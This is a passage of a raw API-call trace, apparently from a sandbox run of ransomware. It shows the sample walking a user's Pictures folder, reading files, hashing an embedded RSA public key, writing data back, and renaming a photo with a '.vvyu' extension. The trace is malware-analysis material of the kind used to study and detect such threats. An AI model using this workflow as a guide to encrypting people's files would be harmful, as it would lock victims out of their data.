(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.973] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.973] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xcfaa, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xcfaa, lpOverlapped=0x0) returned 1 [0194.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.975] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xcfaf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.975] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.975] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.975] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.976] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.976] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.976] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.977] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.977] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.977] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.977] CloseHandle (hObject=0x568) returned 1 [0194.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0194.978] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea3a68 [0194.979] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0194.979] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\bQiz44uQ681_7Dctbgxp.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\bqiz44uq681_7dctbgxp.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\bQiz44uQ681_7Dctbgxp.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\bqiz44uq681_7dctbgxp.jpg.vvyu")) returned 1 [0194.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.980] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.980] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.984] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x798d39b0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798d39b0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7ed1e0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x1f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0194.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea11d0 [0194.984] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea11d0 | out: hHeap=0x620000) returned 1 [0194.984] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\desktop.ini") returned=".ini" [0194.984] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.985] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x655d7070, ftCreationTime.dwHighDateTime=0x1d89f42, ftLastAccessTime.dwLowDateTime=0x24ca5150, ftLastAccessTime.dwHighDateTime=0x1d8a24d, ftLastWriteTime.dwLowDateTime=0x24ca5150, ftLastWriteTime.dwHighDateTime=0x1d8a24d, nFileSizeHigh=0x0, nFileSizeLow=0x11f48, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eoTPxOdhMybXN _gV_k_.jpg", cAlternateFileName="EOTPXO~1.JPG")) returned 1 [0194.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea11d0 [0194.985] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cf30 [0194.985] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea11d0 | out: hHeap=0x620000) returned 1 [0194.985] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\eoTPxOdhMybXN _gV_k_.jpg") returned=".jpg" [0194.985] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\eoTPxOdhMybXN _gV_k_.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\eotpxodhmybxn _gv_k_.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.986] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=73544) returned 1 [0194.986] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.989] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x11f22, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.989] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.994] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.995] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.995] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.995] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x11f48, lpOverlapped=0x0) returned 1 [0194.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.996] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.996] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.996] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.998] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.998] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.998] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.998] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.998] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.998] GetLastError () returned 0x0 [0194.999] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.999] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.999] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.999] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.999] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.999] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.999] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11f50) returned 0x2ea79b0 [0195.000] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.000] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea11d0 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1218 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.000] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c18 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0195.001] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0195.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0195.001] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2c00 [0195.001] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99d28 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c998c8 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0195.002] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.002] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0195.003] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0195.003] GetCurrentThreadId () returned 0x66c [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea03d0 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0195.003] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.004] GetCurrentThreadId () returned 0x66c [0195.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0195.004] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.004] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0195.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0195.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0195.005] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.005] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c60 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c00 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85da8 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c78 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.006] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0195.006] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c48 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2c30 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c90 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c30 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c30 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c48 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c60 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c90 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0195.007] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0195.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0195.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0195.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0195.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0195.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0195.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0195.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0195.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0195.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0195.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0195.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0195.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0195.010] HeapFree 